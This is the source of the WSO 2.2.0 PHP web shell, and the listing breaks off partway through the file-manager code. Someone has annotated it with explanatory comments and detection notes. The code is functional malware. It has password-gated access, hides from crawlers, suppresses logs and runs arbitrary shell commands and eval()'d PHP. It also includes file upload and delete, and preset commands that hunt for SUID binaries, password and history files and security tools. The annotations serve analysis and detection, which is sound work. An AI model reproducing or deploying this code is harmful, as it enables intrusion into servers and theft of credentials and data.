1<?php
// Request prelude of the WSO web shell (banner below). Runs on every request:
// crawler/log evasion first, then magic-quotes cleanup; the login check follows
// further down the file.
2/* WSO 2.2.0 (Web Shell by HARD _LINUX) */
// md5 digest that the login check compares against md5($_POST['pass']); the
// author's own trailing comment records the plaintext.
3$auth_pass = "21232f297a57a5a743894a0e4a801fc3"; //admin
4$color = "#fff";
5$default_action = 'FilesMan';
// SELF_PATH is not read anywhere in this view; presumably consumed by the
// 'SelfRemove' menu action that printHeader() advertises.
6@define('SELF_PATH', __FILE__);
// Any User-Agent containing 'Google' gets a bare 404 and no body, presumably to
// keep the page out of search indexes.
7if( strpos($_SERVER['HTTP_USER_AGENT'],'Google') !== false ) {
8 header('HTTP/1.0 404 Not Found');
9 exit;
10}
11@session_start();
// Anti-forensics: error reporting off, error_log unset, log_errors off, so
// runtime failures leave nothing in the PHP error log. Detection note: this
// trio of ini_set() calls together with blanket '@' suppression is itself a
// useful static indicator.
12@error_reporting(0);
13@ini_set('error_log',NULL);
14@ini_set('log_errors',0);
// No execution time limit for the rest of the request.
15@ini_set('max_execution_time',0);
16@set_time_limit(0);
17@set_magic_quotes_runtime(0);
18@define('VERSION', '2.2.0');
// Undo magic_quotes_gpc escaping on POST data (only ever true on PHP < 5.4);
// recursive so nested arrays such as f[] are covered too.
19if( get_magic_quotes_gpc() ) {
20 function stripslashes_array($array) {
21 return is_array($array) ? array_map('stripslashes_array', $array) : stripslashes($array);
22 }
23 $_POST = stripslashes_array($_POST);
24}
// Render the password prompt and stop the request. Reached when no auth flag is
// in the session and the POSTed 'pass' does not match $auth_pass. The form posts
// back to the same URL with a single 'pass' field.
25function printLogin() {
26 ?>
27 <center>
28 <form method=post style="font-family:fantasy;">
29 Password: <input type=password name=pass style="background-color:whitesmoke;border:1px solid #FFF;"><input type=submit value='>>' style="border:none;background-color:teal;color:#fff;">
30 </form></center>
31 <?php
32 exit;
33}
// Authentication gate. The session flag is keyed by md5() of the Host header.
// Dangling-else layout: printLogin() (which exits) runs only when the flag is
// absent AND the password check fails. An empty $auth_pass disables the
// password entirely. The digest comparison is a loose '==' on two strings.
34if( !isset( $_SESSION[md5($_SERVER['HTTP_HOST'])] ))
35 if( empty( $auth_pass ) ||
36 ( isset( $_POST['pass'] ) && ( md5($_POST['pass']) == $auth_pass ) ) )
37 $_SESSION[md5($_SERVER['HTTP_HOST'])] = true;
38 else
39 printLogin();
// Coarse OS detection; drives path separators and the alias table below.
40if( strtolower( substr(PHP_OS,0,3) ) == "win" )
41 $os = 'win';
42else
43 $os = 'nix';
44$safe_mode = @ini_get('safe_mode');
45$disable_functions = @ini_get('disable_functions');
46$home_cwd = @getcwd();
// The working directory is supplied by the request: when 'c' is posted the
// process chdir()s there before any action runs. If chdir() fails, $cwd stays
// at the previous directory while $_POST['c'] still holds the requested one.
47if( isset( $_POST['c'] ) )
48 @chdir($_POST['c']);
49$cwd = @getcwd();
50if( $os == 'win') {
51 $home_cwd = str_replace("\\", "/", $home_cwd);
52 $cwd = str_replace("\\", "/", $cwd);
53}
// Normalise to a trailing slash; later code builds paths as $cwd . $name.
54if( $cwd[strlen($cwd)-1] != '/' )
55 $cwd .= '/';
56
// Preset commands keyed by their menu label, one table per OS. The values are
// stored as plain strings; the Console action that presents and runs them is
// outside this view. Entries with an empty value ("Find", "Locate") presumably
// act as section headers in that menu.
57if($os == 'win')
58 $aliases = array(
59 "List Directory" => "dir",
60 "Find index.php in current dir" => "dir /s /w /b index.php",
61 "Find *config*.php in current dir" => "dir /s /w /b *config*.php",
62 "Show active connections" => "netstat -an",
63 "Show running services" => "net start",
64 "User accounts" => "net user",
65 "Show computers" => "net view",
66 "ARP Table" => "arp -a",
67 "IP Configuration" => "ipconfig /all"
68 );
69else
70 $aliases = array(
71 "List dir" => "ls -la",
72 "list file attributes on a Linux second extended file system" => "lsattr -va",
73 "show opened ports" => "netstat -an | grep -i listen",
74 "Find" => "",
75 "find all suid files" => "find / -type f -perm -04000 -ls",
76 "find suid files in current dir" => "find . -type f -perm -04000 -ls",
77 "find all sgid files" => "find / -type f -perm -02000 -ls",
78 "find sgid files in current dir" => "find . -type f -perm -02000 -ls",
79 "find config.inc.php files" => "find / -type f -name config.inc.php",
80 "find config* files" => "find / -type f -name \"config*\"",
81 "find config* files in current dir" => "find . -type f -name \"config*\"",
82 "find all writable folders and files" => "find / -perm -2 -ls",
83 "find all writable folders and files in current dir" => "find . -perm -2 -ls",
84 "find all service.pwd files" => "find / -type f -name service.pwd",
85 "find service.pwd files in current dir" => "find . -type f -name service.pwd",
86 "find all .htpasswd files" => "find / -type f -name .htpasswd",
87 "find .htpasswd files in current dir" => "find . -type f -name .htpasswd",
88 "find all .bash_history files" => "find / -type f -name .bash_history",
89 "find .bash_history files in current dir" => "find . -type f -name .bash_history",
90 "find all .fetchmailrc files" => "find / -type f -name .fetchmailrc",
91 "find .fetchmailrc files in current dir" => "find . -type f -name .fetchmailrc",
92 "Locate" => "",
93 "locate httpd.conf files" => "locate httpd.conf",
94 "locate vhosts.conf files" => "locate vhosts.conf",
95 "locate proftpd.conf files" => "locate proftpd.conf",
96 "locate psybnc.conf files" => "locate psybnc.conf",
97 "locate my.conf files" => "locate my.conf",
98 "locate admin.php files" =>"locate admin.php",
99 "locate cfg.php files" => "locate cfg.php",
100 "locate conf.php files" => "locate conf.php",
101 "locate config.dat files" => "locate config.dat",
102 "locate config.php files" => "locate config.php",
103 "locate config.inc files" => "locate config.inc",
104 "locate config.inc.php" => "locate config.inc.php",
105 "locate config.default.php files" => "locate config.default.php",
106 "locate config* files " => "locate config",
107 "locate .conf files"=>"locate '.conf'",
108 "locate .pwd files" => "locate '.pwd'",
109 "locate .sql files" => "locate '.sql'",
110 "locate .htpasswd files" => "locate '.htpasswd'",
111 "locate .bash_history files" => "locate '.bash_history'",
112 "locate .mysql_history files" => "locate '.mysql_history'",
113 "locate .fetchmailrc files" => "locate '.fetchmailrc'",
114 "locate backup files" => "locate backup",
115 "locate dump files" => "locate dump",
116 "locate priv files" => "locate priv"
117 );
// Emit the HTML head, the inline JS helpers, the hidden dispatch form 'mf' and
// the host-information banner that every action page starts with.
//
// The script block defines set()/g()/a()/sr()/processReqChange(): g() fills the
// hidden fields (a = action, c = directory, p1..p3 = parameters, charset) and
// submits 'mf'; a() posts the same fields plus ajax=true over XMLHttpRequest and
// processReqChange() eval()s the response body, which must arrive as
// "<length>\n<javascript>" — the format actionPhp() and actionStringTools()
// produce. The helper names, the 'mf' form and the "WSO <version>" title are
// usable page-content indicators.
//
// Several POST values are echoed unescaped into the markup: 'charset' (meta tag
// and hidden field) and 'a' (hidden field); p1..p3 and the cwd pass through
// htmlspecialchars().
118function printHeader() {
119 if(empty($_POST['charset']))
120 $_POST['charset'] = "UTF-8";
121 global $color;
122 ?>
123<html><head><meta http-equiv='Content-Type' content='text/html; charset=<?=$_POST['charset']?>'><title><?=$_SERVER['HTTP_HOST']?> - WSO <?=VERSION?></title>
124<style>
125 body {background-color:#000;color:#e1e1e1;}
126 body,td,th {font:10pt tahoma,arial,verdana,sans-serif,Lucida Sans;margin:0;vertical-align:top;}
127 table.info {color:#C3C3C3;background-color:#000;}
128 span,h1,a {color:<?=$color?> !important;}
129 span {font-weight:bolder;}
130 h1 {border-left:5px solid teal;padding:2px 5px;font:14pt Verdana;background-color:#222;margin:0px;}
131 div.content {padding:5px;margin-left:5px;background-color:#000;}
132 a {text-decoration:none;}
133 a:hover {text-decoration:underline;}
134 .ml1 {border:1px solid #444;padding:5px;margin:0;overflow:auto;}
135 .bigarea {width:100%;height:250px; }
136 input, textarea, select {margin:0;color:#fff;background-color:#444;border:1px solid #000; font:9pt Courier New;}
137 form {margin:0px;}
138 #toolsTbl {text-align:center;}
139 .toolsInp {width:300px}
140 .main th {text-align:left;background-color:#000;}
141 .main tr:hover{background-color:#5e5e5e}
142 .main td, th{vertical-align:middle}
143 .l1 {background-color:#444}
144 pre {font:9pt Courier New;}
145</style>
146<script>
147 function set(a,c,p1,p2,p3,charset) {
148 if(a != null)document.mf.a.value=a;
149 if(c != null)document.mf.c.value=c;
150 if(p1 != null)document.mf.p1.value=p1;
151 if(p2 != null)document.mf.p2.value=p2;
152 if(p3 != null)document.mf.p3.value=p3;
153 if(charset != null)document.mf.charset.value=charset;
154 }
155 function g(a,c,p1,p2,p3,charset) {
156 set(a,c,p1,p2,p3,charset);
157 document.mf.submit();
158 }
159 function a(a,c,p1,p2,p3,charset) {
160 set(a,c,p1,p2,p3,charset);
161 var params = "ajax=true";
162 for(i=0;i<document.mf.elements.length;i++)
163 params += "&"+document.mf.elements[i].name+"="+encodeURIComponent(document.mf.elements[i].value);
164 sr('<?=$_SERVER['REQUEST_URI'];?>', params);
165 }
166 function sr(url, params) {
167 if (window.XMLHttpRequest) {
168 req = new XMLHttpRequest();
169 req.onreadystatechange = processReqChange;
170 req.open("POST", url, true);
171 req.setRequestHeader ("Content-Type", "application/x-www-form-urlencoded");
172 req.send(params);
173 }
174 else if (window.ActiveXObject) {
175 req = new ActiveXObject("Microsoft.XMLHTTP");
176 if (req) {
177 req.onreadystatechange = processReqChange;
178 req.open("POST", url, true);
179 req.setRequestHeader ("Content-Type", "application/x-www-form-urlencoded");
180 req.send(params);
181 }
182 }
183 }
184 function processReqChange() {
185 if( (req.readyState == 4) )
186 if(req.status == 200) {
187 //alert(req.responseText);
188 var reg = new RegExp("(\\d+)([\\S\\s]*)", "m");
189 var arr=reg.exec(req.responseText);
190 eval(arr[2].substr(0, arr[1]));
191 }
192 else alert("Request error!");
193 }
194</script>
195<head><body><div style="position:absolute;width:100%;background-color:#444;top:0;left:0;">
196<form method=post name=mf style='display:none;'>
197<input type=hidden name=a value='<?=isset($_POST['a'])?$_POST['a']:''?>'>
198<input type=hidden name=c value='<?=htmlspecialchars($GLOBALS['cwd'])?>'>
199<input type=hidden name=p1 value='<?=isset($_POST['p1'])?htmlspecialchars($_POST['p1']):''?>'>
200<input type=hidden name=p2 value='<?=isset($_POST['p2'])?htmlspecialchars($_POST['p2']):''?>'>
201<input type=hidden name=p3 value='<?=isset($_POST['p3'])?htmlspecialchars($_POST['p3']):''?>'>
202<input type=hidden name=charset value='<?=isset($_POST['charset'])?$_POST['charset']:''?>'>
203</form>
204<?php
    // Disk figures for the banner; total falls back to 1 so the percentage
    // computed below never divides by zero.
205 $freeSpace = @diskfreespace($GLOBALS['cwd']);
206 $totalSpace = @disk_total_space($GLOBALS['cwd']);
207 $totalSpace = $totalSpace?$totalSpace:1;
208 $release = @php_uname('r');
209 $kernel = @php_uname('s');
    // Search link on the author's GitHub for the kernel/release string. Note the
    // swapped strpos() arguments: it looks for $kernel inside the literal
    // 'Linux', so the first branch is taken only when $kernel is a substring of
    // 'Linux' (e.g. exactly 'Linux').
210 $millink='https://github.com/HARDLINUX/webshell/search?utf8=✓&q=';
211 if( strpos('Linux', $kernel) !== false )
212 $millink .= urlencode( 'Linux Kernel ' . substr($release,0,6) );
213 else
214 $millink .= urlencode( $kernel . ' ' . substr($release,0,3) );
    // Effective user/group: posix_* lookups when the extension is present,
    // otherwise the script owner via get_current_user()/getmyuid() and an
    // unknown ('?') group name.
215 if(!function_exists('posix_getegid')) {
216 $user = @get_current_user();
217 $uid = @getmyuid();
218 $gid = @getmygid();
219 $group = "?";
220 } else {
221 $uid = @posix_getpwuid(@posix_geteuid());
222 $gid = @posix_getgrgid(@posix_getegid());
223 $user = $uid['name'];
224 $uid = $uid['uid'];
225 $group = $gid['name'];
226 $gid = $gid['gid'];
227 }
    // Clickable breadcrumb, one g('FilesMan', <prefix>) link per path
    // component; component names are inserted without htmlspecialchars().
228 $cwd_links = '';
229 $path = explode("/", $GLOBALS['cwd']);
230 $n=count($path);
231 for($i=0;$i<$n-1;$i++) {
232 $cwd_links .= "<a href='#' onclick='g(\"FilesMan\",\"";
233 for($j=0;$j<=$i;$j++)
234 $cwd_links .= $path[$j].'/';
235 $cwd_links .= "\")'>".$path[$i]."/</a>";
236 }
237 $charsets = array('UTF-8', 'Windows-1251', 'KOI8-R', 'KOI8-U', 'cp866');
238 $opt_charsets = '';
239 foreach($charsets as $item)
240 $opt_charsets .= '<option value="'.$item.'" '.($_POST['charset']==$item?'selected':'').'>'.$item.'</option>';
    // Menu label => action name. The dispatcher that maps these names to the
    // action*() functions is outside this view. Logout is offered only when a
    // password is configured.
241 $m = array('Sec. Info'=>'SecInfo','Files'=>'FilesMan','Console'=>'Console','Infect'=>'Infect','Sql'=>'Sql','Php'=>'Php','Safe mode'=>'SafeMode','String tools'=>'StringTools','Bruteforce'=>'Bruteforce','Network'=>'Network','Domains'=>'Domains');
242
243 if(!empty($GLOBALS['auth_pass']))
244 $m['Logout'] = 'Logout';
245 $m['Self remove'] = 'SelfRemove';
246 $menu = '';
247 foreach($m as $k => $v)
248 $menu .= '<th width="'.(int)(100/count($m)).'%">[ <a href="#" onclick="g(\''.$v.'\',null,\'\',\'\',\'\')">'.$k.'</a> ]</th>';
    // Windows only: probe every drive letter with is_dir() and link those found.
249 $drives = "";
250 if ($GLOBALS['os'] == 'win') {
251 foreach( range('a','z') as $drive )
252 if (is_dir($drive.':\\'))
253 $drives .= '<a href="#" onclick="g(\'FilesMan\',\''.$drive.':/\')">[ '.$drive.' ]</a> ';
254 }
    // Banner table: uname (with a Google search link and the GitHub link above),
    // uid/user and gid/group, PHP version and safe_mode state with a phpinfo
    // link, total/free disk, the breadcrumb with permission colouring and a
    // [ home ] link, then server IP (gethostbyname() of the Host header) and the
    // client's REMOTE_ADDR; finally the menu row.
255 echo '<table class=info cellpadding=3 cellspacing=0 width=100%><tr><td width=1><span>Uname:<br>User:<br>Php:<br>Hdd:<br>Cwd:'.($GLOBALS['os'] == 'win'?'<br>Drives:':'').'</span></td>'.
256 '<td><nobr>'.substr(@php_uname(), 0, 120).' <a href="http://www.google.com/search?q='.urlencode(@php_uname()).'" target="_blank">[Google]</a> <a href="'.$millink.'" target=_blank>[Exploit-Git]</a></nobr><br>'.$uid.' ( '.$user.' ) <span>Group:</span> '.$gid.' ( '.$group.' )<br>'.@phpversion().' <span>Safe mode:</span> '.($GLOBALS['safe_mode']?'<font color=red>ON</font>':'<font color=#00A8A8><b>OFF</b></font>').' <a href=# onclick="g(\'Php\',null,null,\'info\')">[ phpinfo ]</a> <span>Datetime:</span> '.date('Y-m-d H:i:s').'<br>'.viewSize($totalSpace).' <span>Free:</span> '.viewSize($freeSpace).' ('.(int)($freeSpace/$totalSpace*100).'%)<br>'.$cwd_links.' '.viewPermsColor($GLOBALS['cwd']).' <a href=# onclick="g(\'FilesMan\',\''.$GLOBALS['home_cwd'].'\',\'\',\'\',\'\')">[ home ]</a><br>'.$drives.'</td>'.
257 '<td width=1 align=right><nobr><select onchange="g(null,null,null,null,null,this.value)"><optgroup label="Page charset">'.$opt_charsets.'</optgroup></select><br><span>Server IP:</span><br>'.gethostbyname($_SERVER["HTTP_HOST"]).'<br><span>Client IP:</span><br>'.$_SERVER['REMOTE_ADDR'].'</nobr></td></tr></table>'.
258 '<table cellpadding=3 cellspacing=0 width=100% style="background-color:teal;"><tr>'.$menu.'</tr></table><div>';
259}
// Close the content div and emit the tool bar: change dir, read file, make dir,
// make file, execute, upload. Every form calls g() from the header script
// except upload, which posts a multipart form directly. The hidden action in
// the upload form is spelled 'FilesMAn' while every other reference on the page
// uses 'FilesMan'; the dispatcher is outside this view, so whether that matters
// cannot be told here. 'charset' is echoed unescaped into the hidden field.
260function printFooter() {
261 $is_writable = is_writable($GLOBALS['cwd'])?"<font color=teal>[ Writeable ]</font>":"<font color=red>[ Not writable ]</font>";
262?>
263</div>
264<table class=info id=toolsTbl cellpadding=3 cellspacing=0 width=100%">
265 <tr>
266 <td><form onsubmit="g(null,this.c.value);return false;"><span>Change dir:</span><br><input class="toolsInp" type=text name=c value="<?=htmlspecialchars($GLOBALS['cwd']);?>"><input type=submit value=">>"></form></td>
267 <td><form onsubmit="g('FilesTools',null,this.f.value);return false;"><span>Read file:</span><br><input class="toolsInp" type=text name=f><input type=submit value=">>"></form></td>
268 </tr>
269 <tr>
270 <td><form onsubmit="g('FilesMan',null,'mkdir',this.d.value);return false;"><span>Make dir:</span><br><input class="toolsInp" type=text name=d><input type=submit value=">>"></form><?=$is_writable?></td>
271 <td><form onsubmit="g('FilesTools',null,this.f.value,'mkfile');return false;"><span>Make file:</span><br><input class="toolsInp" type=text name=f><input type=submit value=">>"></form><?=$is_writable?></td>
272 </tr>
273 <tr>
274 <td><form onsubmit="g('Console',null,this.c.value);return false;"><span>Execute:</span><br><input class="toolsInp" type=text name=c value=""><input type=submit value=">>"></form></td>
275 <td><form method='post' ENCTYPE='multipart/form-data'>
276 <input type=hidden name=a value='FilesMAn'>
277 <input type=hidden name=c value='<?=htmlspecialchars($GLOBALS['cwd'])?>'>
278 <input type=hidden name=p1 value='uploadFile'>
279 <input type=hidden name=charset value='<?=isset($_POST['charset'])?$_POST['charset']:''?>'>
280 <span>Upload file:</span><br><input class="toolsInp" type=file name=f><input type=submit value=">>"></form><?=$is_writable?></td>
281 </tr>
282
283</table>
284</div>
285</body></html>
286<?php
287}
// Stand-ins that return false when the posix extension is missing but the
// function name is not listed in disable_functions (defining it in that case
// would be a fatal redeclare). Callers fall back to the numeric id or '?'.
288if ( !function_exists("posix_getpwuid") && (strpos($GLOBALS['disable_functions'], 'posix_getpwuid')===false) ) { function posix_getpwuid($p) { return false; } }
289if ( !function_exists("posix_getgrgid") && (strpos($GLOBALS['disable_functions'], 'posix_getgrgid')===false) ) { function posix_getgrgid($p) { return false; } }
// Run a shell command string with whichever execution primitive is available,
// trying in order exec(), passthru(), system(), shell_exec() and finally
// popen(). Returns captured stdout as a string ('' when nothing is usable).
// The command is passed verbatim; no quoting is applied. Detection note: this
// function_exists() fallback ladder is a well-known web-shell construct and a
// good static indicator on its own.
290function ex($in) {
291 $out = '';
292 if(function_exists('exec')) {
293 @exec($in,$out);
294 $out = @join("\n",$out);
295 }elseif(function_exists('passthru')) {
296 ob_start();
297 @passthru($in);
298 $out = ob_get_clean();
299 }elseif(function_exists('system')) {
300 ob_start();
301 @system($in);
302 $out = ob_get_clean();
303 }elseif(function_exists('shell_exec')) {
304 $out = shell_exec($in);
305 }elseif(is_resource($f = @popen($in,"r"))) {
306 $out = "";
307 while(!@feof($f))
308 $out .= fread($f,1024);
309 pclose($f);
310 }
311 return $out;
312}
function viewSize($s) {
    // Human-readable byte count: the largest binary unit that fits, with two
    // decimals; anything below 1 KB is printed as a bare number of bytes.
    $units = array(
        1073741824 => ' GB',
        1048576    => ' MB',
        1024       => ' KB',
    );
    foreach ($units as $divisor => $suffix) {
        if ($s >= $divisor) {
            return sprintf('%1.2f', $s / $divisor) . $suffix;
        }
    }
    return $s . ' B';
}
function perms($p) {
    // Render a numeric mode (as returned by fileperms()) in ls -l form:
    // one type character followed by three rwx triplets. Special bits
    // (setuid/setgid/sticky) replace the 'x' slot with s/t, or S/T when the
    // corresponding execute bit is clear. A non-integer $p (e.g. false from a
    // failed fileperms()) yields 'u---------'.
    $typeLetters = array(
        0xC000 => 's',
        0xA000 => 'l',
        0x8000 => '-',
        0x6000 => 'b',
        0x4000 => 'd',
        0x2000 => 'c',
        0x1000 => 'p',
    );
    $out = 'u';
    // Order matters: the masks overlap, so the first full match wins.
    foreach ($typeLetters as $mask => $letter) {
        if (($p & $mask) == $mask) {
            $out = $letter;
            break;
        }
    }
    // (read, write, exec, special bit, letter when exec set, letter when not)
    $triplets = array(
        array(0x0100, 0x0080, 0x0040, 0x0800, 's', 'S'),
        array(0x0020, 0x0010, 0x0008, 0x0400, 's', 'S'),
        array(0x0004, 0x0002, 0x0001, 0x0200, 't', 'T'),
    );
    foreach ($triplets as $t) {
        list($r, $w, $x, $special, $withExec, $withoutExec) = $t;
        $out .= ($p & $r) ? 'r' : '-';
        $out .= ($p & $w) ? 'w' : '-';
        if ($p & $x) {
            $out .= ($p & $special) ? $withExec : 'x';
        } else {
            $out .= ($p & $special) ? $withoutExec : '-';
        }
    }
    return $out;
}
// perms() string for $f wrapped in a colour: red when not readable, white when
// readable but not writable, teal otherwise. When fileperms() fails it returns
// false and perms(false) renders as 'u---------'.
343function viewPermsColor($f) {
344 if (!@is_readable($f))
345 return '<font color=#FF0000><b>'.perms(@fileperms($f)).'</b></font>';
346 elseif (!@is_writable($f))
347 return '<font color=white><b>'.perms(@fileperms($f)).'</b></font>';
348 else
349 return '<font color=#00A8A8><b>'.perms(@fileperms($f)).'</b></font>';
350}
// Fallback for hosts without scandir(): plain readdir() loop. Differences from
// the native function: no sorting, the directory handle is never closed, and
// $files is not initialised, so an empty or unopenable directory returns null
// rather than an array — which the `=== false` check in actionFilesMan() does
// not catch.
351if(!function_exists("scandir")) {
352 function scandir($dir) {
353 $dh = opendir($dir);
354 while (false !== ($filename = readdir($dh))) {
355 $files[] = $filename;
356 }
357 return $files;
358 }
359}
// Locate $p on PATH by running `which <name>` through ex(). Returns the raw
// command output, or false when it is empty. $p is concatenated unquoted; every
// caller in this view passes a fixed tool name from a hard-coded list.
360function which($p) {
361 $path = ex('which '.$p);
362 if(!empty($path))
363 return $path;
364 return false;
365}
// 'Sec. Info' page: server software, disabled functions, open_basedir and
// safe_mode dirs, cURL and DB client extensions; on *nix additionally whether
// /etc/passwd and /etc/shadow are readable, kernel/distro strings, which tools
// from three hard-coded name lists are on PATH (one `which` shell command per
// name via which()), and /etc/hosts, df -h and /etc/fstab when safe_mode is
// off; on Windows `ver`, `net accounts` and `net user`. showSecParam() is
// declared inside the function body, so a second call in one request would
// fail with a redeclare error.
366function actionSecInfo() {
367 printHeader();
368 echo '<h1>Server security information</h1><div class=content>';
    // Print "name: value"; multi-line values go in a <pre>, empty ones are skipped.
369 function showSecParam($n, $v) {
370 $v = trim($v);
371 if($v) {
372 echo '<span>'.$n.': </span>';
373 if(strpos($v, "\n") === false)
374 echo $v.'<br>';
375 else
376 echo '<pre class=ml1>'.$v.'</pre>';
377 }
378 }
379
380 showSecParam('Server software', @getenv('SERVER_SOFTWARE'));
381 showSecParam('Disabled PHP Functions', ($GLOBALS['disable_functions'])?$GLOBALS['disable_functions']:'none');
382 showSecParam('Open base dir', @ini_get('open_basedir'));
383 showSecParam('Safe mode exec dir', @ini_get('safe_mode_exec_dir'));
384 showSecParam('Safe mode include dir', @ini_get('safe_mode_include_dir'));
385 showSecParam('cURL support', function_exists('curl_version')?'enabled':'no');
386 $temp=array();
387 if(function_exists('mysql_get_client_info'))
388 $temp[] = "MySql (".mysql_get_client_info().")";
389 if(function_exists('mssql_connect'))
390 $temp[] = "MSSQL";
391 if(function_exists('pg_connect'))
392 $temp[] = "PostgreSQL";
393 if(function_exists('oci_connect'))
394 $temp[] = "Oracle";
395 showSecParam('Supported databases', implode(', ', $temp));
396 echo '<br>';
397
398 if( $GLOBALS['os'] == 'nix' ) {
399 $userful = array('gcc','lcc','cc','ld','make','php','perl','python','ruby','tar','gzip','bzip','bzip2','nc','locate','suidperl');
400 $danger = array('kav','nod32','bdcored','uvscan','sav','drwebd','clamd','rkhunter','chkrootkit','iptables','ipfw','tripwire','shieldcc','portsentry','snort','ossec','lidsadm','tcplodg','sxid','logcheck','logwatch','sysmask','zmbscap','sawmill','wormscan','ninja');
401 $downloaders = array('wget','fetch','lynx','links','curl','get','lwp-mirror');
    // The shadow [view] link passes "etc" as the directory where the passwd
    // link passes "/etc/", so it resolves relative to the current directory.
402 showSecParam('Readable /etc/passwd', @is_readable('/etc/passwd')?"yes <a href='#' onclick='g(\"FilesTools\", \"/etc/\", \"passwd\")'>[view]</a>":'no');
403 showSecParam('Readable /etc/shadow', @is_readable('/etc/shadow')?"yes <a href='#' onclick='g(\"FilesTools\", \"etc\", \"shadow\")'>[view]</a>":'no');
404 showSecParam('OS version', @file_get_contents('/proc/version'));
405 showSecParam('Distr name', @file_get_contents('/etc/issue.net'));
406 if(!$GLOBALS['safe_mode']) {
407 echo '<br>';
408 $temp=array();
409 foreach ($userful as $item)
410 if(which($item)){$temp[]=$item;}
411 showSecParam('Userful', implode(', ',$temp));
412 $temp=array();
413 foreach ($danger as $item)
414 if(which($item)){$temp[]=$item;}
415 showSecParam('Danger', implode(', ',$temp));
416 $temp=array();
417 foreach ($downloaders as $item)
418 if(which($item)){$temp[]=$item;}
419 showSecParam('Downloaders', implode(', ',$temp));
420 echo '<br/>';
421 showSecParam('Hosts', @file_get_contents('/etc/hosts'));
422 showSecParam('HDD space', ex('df -h'));
423 showSecParam('Mount options', @file_get_contents('/etc/fstab'));
424 }
425 } else {
426 showSecParam('OS Version',ex('ver'));
427 showSecParam('Account Settings',ex('net accounts'));
428 showSecParam('User Accounts',ex('net user'));
429 }
430 echo '</div>';
431 printFooter();
432}
// 'Php' page: passes the POSTed p1 string to eval(). With 'ajax' set, the
// captured output comes back as "<length>\n<javascript>" for processReqChange()
// in the page header (the JS fills #PhpOutput); otherwise a full page with the
// code form and the escaped output is rendered. p2 == 'info' additionally dumps
// phpinfo() with its page-level CSS removed by regex.
433function actionPhp() {
434 if( isset($_POST['ajax']) ) {
    // Remember the AJAX preference in the session, keyed like the auth flag.
435 $_SESSION[md5($_SERVER['HTTP_HOST']).'ajax'] = true;
436 ob_start();
437 eval($_POST['p1']);
    // Output is HTML-escaped, then escaped again for the single-quoted JS string.
438 $temp = "document.getElementById('PhpOutput').style.display='';document.getElementById('PhpOutput').innerHTML='".addcslashes(htmlspecialchars(ob_get_clean()),"\n\r\t\\'\0")."';\n";
439 echo strlen($temp), "\n", $temp;
440 exit;
441 }
442 printHeader();
443 if( isset($_POST['p2']) && ($_POST['p2'] == 'info') ) {
444 echo '<h1>PHP info</h1><div class=content>';
445 ob_start();
446 phpinfo();
447 $tmp = ob_get_clean();
    // Strip phpinfo()'s own body/anchor/h1 styling so it fits the page theme.
448 $tmp = preg_replace('!body {.*}!msiU','',$tmp);
449 $tmp = preg_replace('!a:\w+ {.*}!msiU','',$tmp);
450 $tmp = preg_replace('!h1!msiU','h2',$tmp);
451 $tmp = preg_replace('!td, th {(.*)}!msiU','.e, .v, .h, .h th {$1}',$tmp);
452 $tmp = preg_replace('!body, td, th, h2, h2 {.*}!msiU','',$tmp);
453 echo $tmp;
454 echo '</div><br>';
455 }
456 if(empty($_POST['ajax'])&&!empty($_POST['p1']))
457 $_SESSION[md5($_SERVER['HTTP_HOST']).'ajax'] = false;
    // Form submits via a() (AJAX) or g() (full page); the previous code is
    // re-shown in the textarea through htmlspecialchars().
458 echo '<h1>Execution PHP-code</h1><div class=content><form name=pf method=post onsubmit="if(this.ajax.checked){a(null,null,this.code.value);}else{g(null,null,this.code.value,\'\');}return false;"><textarea name=code class=bigarea id=PhpCode>'.(!empty($_POST['p1'])?htmlspecialchars($_POST['p1']):'').'</textarea><input type=submit value=Eval style="margin-top:5px">';
459 echo ' <input type=checkbox name=ajax value=1 '.($_SESSION[md5($_SERVER['HTTP_HOST']).'ajax']?'checked':'').'> send using AJAX</form><pre id=PhpOutput style="'.(empty($_POST['p1'])?'display:none;':'').'margin-top:5px;" class=ml1>';
    // Non-AJAX path: the same eval(), output escaped into the <pre>.
460 if(!empty($_POST['p1'])) {
461 ob_start();
462 eval($_POST['p1']);
463 echo htmlspecialchars(ob_get_clean());
464 }
465 echo '</pre></div>';
466 printFooter();
467}
// File manager page. First applies the operation named in p1 (upload, mkdir,
// delete, paste, or remembering a copy/move selection), then lists the
// directory sorted by the column given in p1. The helpers deleteDir(),
// copy_paste(), move_paste() and cmp() are declared inside the function at run
// time, so this action cannot run twice in one request.
468function actionFilesMan() {
469 printHeader();
470 echo '<h1>File manager</h1><div class=content>';
471 if(isset($_POST['p1'])) {
472 switch($_POST['p1']) {
    // Upload: written under the client-supplied original name, relative to the
    // current (chdir()ed) directory. The second 'break' is unreachable.
473 case 'uploadFile':
474 if(!@move_uploaded_file($_FILES['f']['tmp_name'], $_FILES['f']['name']))
475 echo "Can't upload file!";
476 break;
477 break;
478 case 'mkdir':
479 if(!@mkdir($_POST['p2']))
480 echo "Can't create new dir";
481 break;
    // Delete: f[] carries urlencoded names; directories are removed recursively.
482 case 'delete':
483 function deleteDir($path) {
484 $path = (substr($path,-1)=='/') ? $path:$path.'/';
485 $dh = opendir($path);
486 while ( ($item = readdir($dh) ) !== false) {
487 $item = $path.$item;
488 if ( (basename($item) == "..") || (basename($item) == ".") )
489 continue;
490 $type = filetype($item);
491 if ($type == "dir")
492 deleteDir($item);
493 else
494 @unlink($item);
495 }
496 closedir($dh);
497 rmdir($path);
498 }
499 if(is_array(@$_POST['f']))
500 foreach($_POST['f'] as $f) {
501 $f = urldecode($f);
502 if(is_dir($f))
503 deleteDir($f);
504 else
505 @unlink($f);
506 }
507 break;
    // Paste: replays the selection the default branch stored in the session.
    // $_SESSION['cwd'] is the source directory, $GLOBALS['cwd'] the destination.
508 case 'paste':
509 if($_SESSION['act'] == 'copy') {
    // Recursive copy of $c.$s into $d.$s; directories are recreated with mkdir().
510 function copy_paste($c,$s,$d){
511 if(is_dir($c.$s)){
512 mkdir($d.$s);
513 $h = opendir($c.$s);
514 while (($f = readdir($h)) !== false)
515 if (($f != ".") and ($f != "..")) {
516 copy_paste($c.$s.'/',$f, $d.$s.'/');
517 }
518 } elseif(is_file($c.$s)) {
519 @copy($c.$s, $d.$s);
520 }
521 }
522 foreach($_SESSION['f'] as $f)
523 copy_paste($_SESSION['cwd'],$f, $GLOBALS['cwd']);
524 } elseif($_SESSION['act'] == 'move') {
    // move_paste() is declared but never called: the move below uses rename().
    // Its body also calls copy_paste(), which only exists once the 'copy'
    // branch above has run.
525 function move_paste($c,$s,$d){
526 if(is_dir($c.$s)){
527 mkdir($d.$s);
